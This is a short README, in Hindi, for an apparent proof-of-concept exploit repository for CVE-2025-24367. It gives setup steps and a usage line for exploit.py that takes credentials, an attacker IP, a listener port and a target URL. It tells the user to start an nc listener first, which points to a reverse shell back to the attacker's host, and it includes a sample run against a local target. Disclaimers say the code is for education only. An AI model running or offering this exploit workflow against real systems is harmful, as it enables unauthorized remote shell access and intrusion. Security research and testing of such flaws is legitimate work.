
Proof of Concept for CVE-2025-24367
महत्वपूर्ण — पहले यह पढ़ें:
यह रिपॉजिटरी औरexploit.pyकेवल शैक्षिक और अनुसंधान उद्देश्यों के लिए प्रदान किए गए हैं। इस कोड का उपयोग उन सिस्टम, नेटवर्क या सेवाओं के विरुद्ध न करें जिनके लिए आपके पास स्पष्ट, लिखित प्राधिकरण नहीं है। कंप्यूटर सिस्टम तक अनधिकृत पहुंच अवैध और अनैतिक है। इस कोड का उपयोग करके आप लागू कानूनों और संस्थागत नीतियों का पालन करने के लिए सहमत हैं।
python3 -m venv venv
source venv/bin/activate
pip install requests beautifulsoup4
python3 exploit.py -u <username> -p <password> -i <attacker_ip> -l <listener_port> -url <target_url> [--proxy]
स्क्रिप्ट चलाने से पहले सुनिश्चित करें कि आपके पास एक nc लिसनर चल रहा है। डिबगिंग के अलावा बिना प्रॉक्सी के स्क्रिप्ट चलाएं:
python3 exploit.py \
-u testuser \
-p Welcome1 \
-i 192.168.43.11 \
-l 4444 \
-url http://localhost
अंतिम अनुस्मारक: यह स्क्रिप्ट और README केवल शैक्षिक उपयोग के लिए हैं। इन उपकरणों का उपयोग कभी भी अवैध रूप से सिस्टम तक पहुंचने के लिए न करें।